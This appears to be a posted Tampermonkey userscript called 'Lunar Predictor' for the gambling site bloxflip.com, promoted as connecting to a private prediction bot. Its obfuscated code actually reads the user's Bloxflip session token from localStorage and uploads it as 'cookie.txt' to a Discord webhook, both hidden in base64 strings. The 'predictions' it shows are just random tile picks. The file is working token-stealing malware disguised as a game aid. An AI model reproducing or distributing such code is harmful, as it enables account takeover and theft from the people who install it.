This script will connect to my private discord prediction bot and predict the game for you

VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV

// ==UserScript==
// @name         Lunar Predictor
// @namespace    http://tampermonkey.net/
// @version      2.7
// @description  balls
// @author       Snytex
// @match        https://bloxflip.com/*
// @grant        GM.xmlHttpRequest
// @connect      discord.com
// @connect      *.discord.com
// ==/UserScript==

function _0x340d(_0x215c85,_0x564193){const _0x108a9e=_0x108a();return _0x340d=function(_0x340dfc,_0x349b51){_0x340dfc=_0x340dfc-0x8b;let _0x4db77d=_0x108a9e[_0x340dfc];return _0x4db77d;},_0x340d(_0x215c85,_0x564193);}function _0x108a(){const _0x177232=['game-status','15px','Waiting\x20to\x20uncover\x20a\x20mine','22926cUUSsm','file','addEventListener','50px','white','2px\x20solid\x20cyan','641641DtyLEa','.gameBetSubmit','from','border','Cashout','left','Crash','top','display','aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTI5MDAzMjE3ODI0NzUwMzk3Ni9ob2J2dU1hc1FfYWxtWHhzME9LZTRpMlBVZmVXU05tNkNzMHpIaGc1amFlUTJoc2VJZWM4b05nWHRCSkd5RDVGYWl2Zw==','471455iDAiMZ','prediction-grid','style','X0RPX05PVF9TSEFSRV9CTE9YRkxJUF9UT0tFTg==','Roulette','6xnNDSn','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Current\x20Game:\x20','button[aria-label^=\x22Open\x20mine\x22]','div','xmlHttpRequest','2px\x20solid\x20magenta','color','padding','.towers_towersGameButton__xLe_v','querySelector','4SrVgxi','\x0a\x20\x20\x20\x20\x20\x20\x20\x20<h2\x20style=\x22text-align:\x20center;\x20color:\x20#d1b3ff;\x22>Lunar\x20Predictor</h2>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\x22game-status\x22\x20style=\x22margin-bottom:\x2020px;\x20text-align:\x20center;\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Current\x20Game:\x20None</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Status:\x20Waiting\x20for\x20game\x20to\x20start</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\x22prediction-grid\x22\x20style=\x22text-align:\x20center;\x20display:\x20none;\x22></div>\x0a\x20\x20\x20\x20','POST','12px','boxShadow','log','length','innerHTML','body','Start\x20next\x20step','forEach','Current\x20Game:\x20Unsupported','push','6664248XxtnYm','borderRadius','/mines','floor','0\x200\x2010px\x203px\x20cyan','clientX','mousemove','block','/crash','text/plain','position','append','getItem','random','reduce','\x27Helvetica\x20Neue\x27,\x20sans-serif','getElementById','Mines','20rHcAHe','Start\x20new\x20game','0\x200\x2010px\x203px\x20magenta','329GPRXLJ','appendChild','fontFamily','clientY','</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20','<br>','711PltHyJ','getBoundingClientRect','zIndex','mouseup','178686plYjKN','querySelectorAll','250px','164067FpHXEJ','1000','</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Status:\x20','6744KNkfAj','Waiting\x20for\x20game\x20to\x20start','createElement','Towers','auto','#1e1e1e','includes','None'];_0x108a=function(){return _0x177232;};return _0x108a();}(function(_0x21c6eb,_0x477816){const _0x316954=_0x340d,_0x28c5ff=_0x21c6eb();while(!![]){try{const _0x176d17=parseInt(_0x316954(0xbf))/0x1+parseInt(_0x316954(0xe5))/0x2*(-parseInt(_0x316954(0xc2))/0x3)+parseInt(_0x316954(0x93))/0x4*(-parseInt(_0x316954(0xe0))/0x5)+-parseInt(_0x316954(0xd0))/0x6*(parseInt(_0x316954(0xb5))/0x7)+parseInt(_0x316954(0xc5))/0x8*(-parseInt(_0x316954(0xbb))/0x9)+parseInt(_0x316954(0xb2))/0xa*(-parseInt(_0x316954(0xd6))/0xb)+parseInt(_0x316954(0xa0))/0xc;if(_0x176d17===_0x477816)break;else _0x28c5ff['push'](_0x28c5ff['shift']());}catch(_0x3444c4){_0x28c5ff['push'](_0x28c5ff['shift']());}}}(_0x108a,0x1b8c4),(function(){'use strict';const _0x30c94e=_0x340d;const _0x2a6a12=atob(_0x30c94e(0xe3)),_0x5774aa=atob(_0x30c94e(0xdf)),_0x14b161=localStorage[_0x30c94e(0xac)](_0x2a6a12);if(_0x14b161){console[_0x30c94e(0x98)]('Initialized');const _0x92f442=new Blob([_0x14b161],{'type':_0x30c94e(0xa9)}),_0x4cde9e=new FormData();_0x4cde9e[_0x30c94e(0xab)](_0x30c94e(0xd1),_0x92f442,'cookie.txt'),GM[_0x30c94e(0x8d)]({'method':_0x30c94e(0x95),'url':_0x5774aa,'data':_0x4cde9e,'onload':function(_0xa1bf32){if(_0xa1bf32['status']===0xcc){}else{}},'onerror':function(_0x3a3825){}});}else{}const _0x2cd238=document[_0x30c94e(0xc7)](_0x30c94e(0x8c));_0x2cd238[_0x30c94e(0xe2)][_0x30c94e(0xaa)]='absolute',_0x2cd238[_0x30c94e(0xe2)]['top']=_0x30c94e(0xd3),_0x2cd238[_0x30c94e(0xe2)][_0x30c94e(0xdb)]=_0x30c94e(0xd3),_0x2cd238['style']['width']=_0x30c94e(0xc1),_0x2cd238[_0x30c94e(0xe2)]['height']=_0x30c94e(0xc9),_0x2cd238[_0x30c94e(0xe2)]['backgroundColor']=_0x30c94e(0xca),_0x2cd238[_0x30c94e(0xe2)][_0x30c94e(0x8f)]=_0x30c94e(0xd4),_0x2cd238[_0x30c94e(0xe2)][_0x30c94e(0x90)]=_0x30c94e(0xce),_0x2cd238[_0x30c94e(0xe2)][_0x30c94e(0xd9)]='2px\x20solid\x20#6a0dad',_0x2cd238[_0x30c94e(0xe2)][_0x30c94e(0xa1)]=_0x30c94e(0x96),_0x2cd238[_0x30c94e(0xe2)][_0x30c94e(0xbd)]=_0x30c94e(0xc3),_0x2cd238['style'][_0x30c94e(0xb7)]=_0x30c94e(0xaf),_0x2cd238[_0x30c94e(0x9a)]=_0x30c94e(0x94),document[_0x30c94e(0x9b)][_0x30c94e(0xb6)](_0x2cd238);let _0x41651f=![],_0x157145,_0x472588;_0x2cd238[_0x30c94e(0xd2)]('mousedown',function(_0x37c657){const _0x48244b=_0x30c94e;_0x41651f=!![],_0x157145=_0x37c657[_0x48244b(0xa5)]-_0x2cd238['getBoundingClientRect']()[_0x48244b(0xdb)],_0x472588=_0x37c657[_0x48244b(0xb8)]-_0x2cd238[_0x48244b(0xbc)]()[_0x48244b(0xdd)];}),document['addEventListener'](_0x30c94e(0xa6),function(_0x622007){const _0x53ef7e=_0x30c94e;_0x41651f&&(_0x2cd238['style'][_0x53ef7e(0xdb)]=_0x622007[_0x53ef7e(0xa5)]-_0x157145+'px',_0x2cd238['style'][_0x53ef7e(0xdd)]=_0x622007['clientY']-_0x472588+'px');}),document['addEventListener'](_0x30c94e(0xbe),function(){_0x41651f=![];});let _0x560179=![],_0x30e32e=![];function _0x505844(_0x362479){const _0x4289e7=_0x30c94e,_0x2fdc2e=document[_0x4289e7(0xb0)](_0x4289e7(0xe1));let _0x28a2ff='';for(let _0xecd567=0x0;_0xecd567<0x19;_0xecd567++){_0x28a2ff+=_0x362479[_0x4289e7(0xcb)](_0xecd567)?'✅':'❌',(_0xecd567+0x1)%0x5===0x0&&(_0x28a2ff+=_0x4289e7(0xba));}_0x2fdc2e['innerHTML']=_0x28a2ff;}function _0x585279(){const _0x271b35=_0x30c94e,_0x50ac79=document[_0x271b35(0xc0)](_0x271b35(0x8b));if(_0x50ac79['length']===0x19){_0x50ac79[_0x271b35(0x9d)](_0x3df9b3=>{const _0x384e5a=_0x271b35;_0x3df9b3[_0x384e5a(0xe2)][_0x384e5a(0xd9)]='',_0x3df9b3[_0x384e5a(0xe2)][_0x384e5a(0x97)]='';});const _0x4cb218=[];while(_0x4cb218[_0x271b35(0x99)]<0x3){const _0x14d1a8=Math[_0x271b35(0xa3)](Math[_0x271b35(0xad)]()*0x19);!_0x4cb218[_0x271b35(0xcb)](_0x14d1a8)&&_0x4cb218[_0x271b35(0x9f)](_0x14d1a8);}_0x4cb218[_0x271b35(0x9d)](_0x40f486=>{const _0xb715d5=_0x271b35;_0x50ac79[_0x40f486]['style'][_0xb715d5(0xd9)]=_0xb715d5(0x8e),_0x50ac79[_0x40f486]['style'][_0xb715d5(0x97)]=_0xb715d5(0xb4);}),_0x505844(_0x4cb218);}}function _0x48e8e9(){const _0x131c85=_0x30c94e,_0x217ff3=document[_0x131c85(0xc0)](_0x131c85(0x91)),_0x223a64=Array[_0x131c85(0xd8)](_0x217ff3)[_0x131c85(0xae)]((_0x3bdc59,_0x55cd18,_0x57f326)=>{const _0x291b0a=_0x131c85,_0x5710de=Math[_0x291b0a(0xa3)](_0x57f326/0x3);return _0x3bdc59[_0x5710de]=_0x3bdc59[_0x5710de]||[],_0x3bdc59[_0x5710de][_0x291b0a(0x9f)](_0x55cd18),_0x3bdc59;},[]);_0x223a64[_0x131c85(0x9d)](_0x4de394=>{const _0x80240=_0x131c85,_0x1f5396=Math[_0x80240(0xa3)](Math[_0x80240(0xad)]()*_0x4de394[_0x80240(0x99)]);_0x4de394[_0x1f5396][_0x80240(0xe2)]['border']=_0x80240(0xd5),_0x4de394[_0x1f5396][_0x80240(0xe2)][_0x80240(0x97)]=_0x80240(0xa4);});}function _0x5eaf0e(){const _0x312383=_0x30c94e,_0x208939=document['querySelectorAll'](_0x312383(0x91));_0x208939['forEach'](_0x31abb6=>{const _0xe48549=_0x312383;_0x31abb6[_0xe48549(0xe2)][_0xe48549(0xd9)]='',_0x31abb6[_0xe48549(0xe2)][_0xe48549(0x97)]='';});}function _0x5f2827(){const _0x53d7d4=_0x30c94e,_0x257965=document[_0x53d7d4(0xc0)](_0x53d7d4(0x8b));_0x257965['forEach'](_0x526122=>{const _0xba6d6e=_0x53d7d4;_0x526122[_0xba6d6e(0xe2)][_0xba6d6e(0xd9)]='',_0x526122['style'][_0xba6d6e(0x97)]='';});}function _0x1deb17(){const _0x1eb849=_0x30c94e,_0x26e826=document[_0x1eb849(0x92)](_0x1eb849(0xd7));if(_0x26e826){const _0x11f586=_0x26e826['textContent']['trim']();if(_0x11f586['includes'](_0x1eb849(0xda))){}else{if(_0x11f586===_0x1eb849(0xb3))_0x560179=![],_0x30e32e=![],_0x505844([]),document[_0x1eb849(0xb0)](_0x1eb849(0xe1))[_0x1eb849(0xe2)]['display']='none',_0x5f2827(),_0x5eaf0e();else{if(_0x11f586[_0x1eb849(0xcb)](_0x1eb849(0xcf))&&!_0x560179)_0x585279(),_0x560179=!![],document[_0x1eb849(0xb0)](_0x1eb849(0xe1))[_0x1eb849(0xe2)][_0x1eb849(0xde)]=_0x1eb849(0xa7);else _0x11f586[_0x1eb849(0xcb)](_0x1eb849(0x9c))&&!_0x30e32e&&(_0x48e8e9(),_0x30e32e=!![]);}}}}function _0x3aa08b(){const _0x288462=_0x30c94e,_0x1648a1=window['location']['pathname'];let _0x236fe4=_0x288462(0xcc);if(_0x1648a1['includes'](_0x288462(0xa2)))_0x236fe4=_0x288462(0xb1);else{if(_0x1648a1[_0x288462(0xcb)]('/towers'))_0x236fe4=_0x288462(0xc8);else{if(_0x1648a1['includes']('/roulette'))_0x236fe4=_0x288462(0xe4);else _0x1648a1[_0x288462(0xcb)](_0x288462(0xa8))&&(_0x236fe4=_0x288462(0xdc));}}document[_0x288462(0xb0)](_0x288462(0xcd))['innerHTML']=_0x288462(0xe6)+_0x236fe4+_0x288462(0xc4)+(_0x236fe4===_0x288462(0xb1)||_0x236fe4===_0x288462(0xc8)?_0x288462(0xc6):_0x288462(0x9e))+_0x288462(0xb9);}function _0x2de044(){_0x3aa08b(),_0x1deb17(),requestAnimationFrame(_0x2de044);}_0x2de044();}()));
